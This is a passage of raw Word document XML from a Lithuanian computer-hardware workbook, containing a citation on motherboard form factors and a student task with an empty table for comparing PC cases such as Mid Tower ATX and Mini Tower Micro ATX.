        <w:t>Types of Motherboard Form Factors.</w:t>
      </w:r>
      <w:r w:rsidR="0041072E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> (2019, lapkričio 7). </w:t>
      </w:r>
      <w:r w:rsidR="0041072E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
        </w:rPr>
        <w:t>Lanner.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Prieiga per internetą:</w:t>
      </w:r>
      <w:r w:rsidR="0041072E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId198" w:history="1">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://www.lanner-america.com/blog/types-motherboard-form-factors/#:~:text=The%20form%20factor%20determines%20the,pico%2DATX%2C%20and%20further</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2A9D5D0D" w14:textId="2BBBA7FE" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72079269" w14:textId="2E6E7D8E" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="003D0977" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="00605244" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> užduotis</w:t>
      </w:r>
      <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> SUKUR</w:t>
      </w:r>
      <w:r w:rsidR="00B7190C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>TI</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>LENTELĘ IR PALYGINTI KELIŲ</w:t>
      </w:r>
      <w:r w:rsidR="00C77F6D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>FORMOS FAKTORIŲ KORPUSUS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622AE1B2" w14:textId="03E4FCB7" w:rsidR="00B7190C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">UŽDUOTIES SĄLYGA: </w:t>
      </w:r>
      <w:r w:rsidR="00B7190C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Pasirinkite</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">kelių formos faktorių korpusus </w:t>
      </w:r>
      <w:r w:rsidR="00B7190C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">pvz., Mid Tower (ATX), Mini </w:t>
      </w:r>
      <w:r w:rsidR="6AE46101" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ower (Micro ATX) skirtus stacionariems kompiuteriams</w:t>
      </w:r>
      <w:r w:rsidR="00B7190C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> ir palygin</w:t>
      </w:r>
      <w:r w:rsidR="00B7190C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">kite </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>jų d</w:t>
      </w:r>
      <w:r w:rsidR="00B7190C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>y</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>džius bei charakteristikas.</w:t>
      </w:r>
      <w:r w:rsidR="00B7190C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Pagal pateiktą apačioje pavyzdį</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B7190C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>sudarykite</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B7190C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>lentelę</w:t>
      </w:r>
      <w:r w:rsidR="00197EFE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="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4"/>
        <w:gridCol w:w="3306"/>
      </w:tblGrid>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="7142C794" w14:textId="77777777" w:rsidTr="10C2F772">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1665" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="4E92FDAE" w14:textId="77777777" w:rsidR="00750DF8" w:rsidRPr="005A5C28" w:rsidRDefault="00750DF8" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Korpuso modelis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1667" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="781ADEAA" w14:textId="3FE1C1F7" w:rsidR="00750DF8" w:rsidRPr="005A5C28" w:rsidRDefault="00750DF8" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="39DD1386" w14:textId="61E59714" w:rsidR="00750DF8" w:rsidRPr="005A5C28" w:rsidRDefault="00750DF8" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="1610A8A6" w14:textId="77777777" w:rsidTr="10C2F772">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1665" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="29EF790B" w14:textId="77777777" w:rsidR="00750DF8" w:rsidRPr="005A5C28" w:rsidRDefault="00750DF8" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Gamintojas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1667" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="630373A2" w14:textId="380A6AD9" w:rsidR="00750DF8" w:rsidRPr="005A5C28" w:rsidRDefault="00750DF8" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="1678097C" w14:textId="52DB098E" w:rsidR="00750DF8" w:rsidRPr="005A5C28" w:rsidRDefault="00750DF8" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="2FF94EAD" w14:textId="77777777" w:rsidTr="10C2F772">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1665" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="1822B08A" w14:textId="77777777" w:rsidR="00750DF8" w:rsidRPr="005A5C28" w:rsidRDefault="00750DF8" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Medžiaga</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1667" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="05DB5582" w14:textId="7A2AD900" w:rsidR="00750DF8" w:rsidRPr="005A5C28" w:rsidRDefault="00750DF8" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="4A6C189E" w14:textId="02B1CDA5" w:rsidR="00750DF8" w:rsidRPr="005A5C28" w:rsidRDefault="00750DF8" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="26CFC883" w14:textId="77777777" w:rsidTr="10C2F772">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1665" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="0A4BFE32" w14:textId="77777777" w:rsidR="00750DF8" w:rsidRPr="005A5C28" w:rsidRDefault="00750DF8" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Spalva</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1667" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="2063723F" w14:textId="53398275" w:rsidR="00750DF8" w:rsidRPr="005A5C28" w:rsidRDefault="00750DF8" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="2222A990" w14:textId="58D3DFB2" w:rsidR="00750DF8" w:rsidRPr="005A5C28" w:rsidRDefault="00750DF8" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="611CEC23" w14:textId="77777777" w:rsidTr="10C2F772">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1665" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="0C4C2335" w14:textId="77777777" w:rsidR="00750DF8" w:rsidRPr="005A5C28" w:rsidRDefault="00750DF8" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Korpuso formos faktorius (dydis)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1667" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5FEF6505" w14:textId="46E9DE70" w:rsidR="00750DF8" w:rsidRPr="005A5C28" w:rsidRDefault="00750DF8" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="7E035691" w14:textId="604EB7B1" w:rsidR="00750DF8" w:rsidRPr="005A5C28" w:rsidRDefault="00750DF8" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="523B50DD" w14:textId="77777777" w:rsidTr="10C2F772">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1665" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="2D9BF779" w14:textId="77777777" w:rsidR="00750DF8" w:rsidRPr="005A5C28" w:rsidRDefault="00750DF8" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Išplėtimo galimybės</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1667" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5371A0FE" w14:textId="52316354" w:rsidR="00750DF8" w:rsidRPr="005A5C28" w:rsidRDefault="00750DF8" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="493A076A" w14:textId="15074010" w:rsidR="00750DF8" w:rsidRPr="005A5C28" w:rsidRDefault="00750DF8" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="55D93538" w14:textId="77777777" w:rsidTr="10C2F772">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1665" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="489A0294" w14:textId="77777777" w:rsidR="00750DF8" w:rsidRPr="005A5C28" w:rsidRDefault="00750DF8" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Priekinio skydelio jungtys</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1667" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5761CEDE" w14:textId="1690B754" w:rsidR="00750DF8" w:rsidRPr="005A5C28" w:rsidRDefault="00750DF8" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5E49F217" w14:textId="4BBC6C39" w:rsidR="00750DF8" w:rsidRPr="005A5C28" w:rsidRDefault="00750DF8" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="360A7383" w14:textId="77777777" w:rsidTr="10C2F772">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1665" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="08DB8F85" w14:textId="77777777" w:rsidR="00750DF8" w:rsidRPr="005A5C28" w:rsidRDefault="00750DF8" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Papildomai</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1667" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6A1DA38D" w14:textId="4BFBB58F" w:rsidR="00750DF8" w:rsidRPr="005A5C28" w:rsidRDefault="00750DF8" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="548CBBB8" w14:textId="48D5C537" w:rsidR="00750DF8" w:rsidRPr="005A5C28" w:rsidRDefault="00750DF8" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="7C268930" w14:textId="77777777" w:rsidTr="10C2F772">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1665" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="49FE311F" w14:textId="77777777" w:rsidR="00750DF8" w:rsidRPr="005A5C28" w:rsidRDefault="00750DF8" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Matmenys ir svoris</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1667" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5AD818E9" w14:textId="137F752C" w:rsidR="00750DF8" w:rsidRPr="005A5C28" w:rsidRDefault="00750DF8" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="170D8150" w14:textId="1270FBFB" w:rsidR="00750DF8" w:rsidRPr="005A5C28" w:rsidRDefault="00750DF8" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="649276D4" w14:textId="77777777" w:rsidTr="10C2F772">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1665" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6D6A004E" w14:textId="77777777" w:rsidR="00750DF8" w:rsidRPr="005A5C28" w:rsidRDefault="00750DF8" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Kaina </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1667" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="169A9292" w14:textId="03C4A4E0" w:rsidR="00750DF8" w:rsidRPr="005A5C28" w:rsidRDefault="00750DF8" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="42F5A39C" w14:textId="1BBEDA2D" w:rsidR="00750DF8" w:rsidRPr="005A5C28" w:rsidRDefault="00750DF8" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="04628764" w14:textId="77777777" w:rsidR="00A06B35" w:rsidRPr="005A5C28" w:rsidRDefault="00A06B35" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Papildomi informacijos šaltiniai:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4616EB87" w14:textId="3A90A897" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="137"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
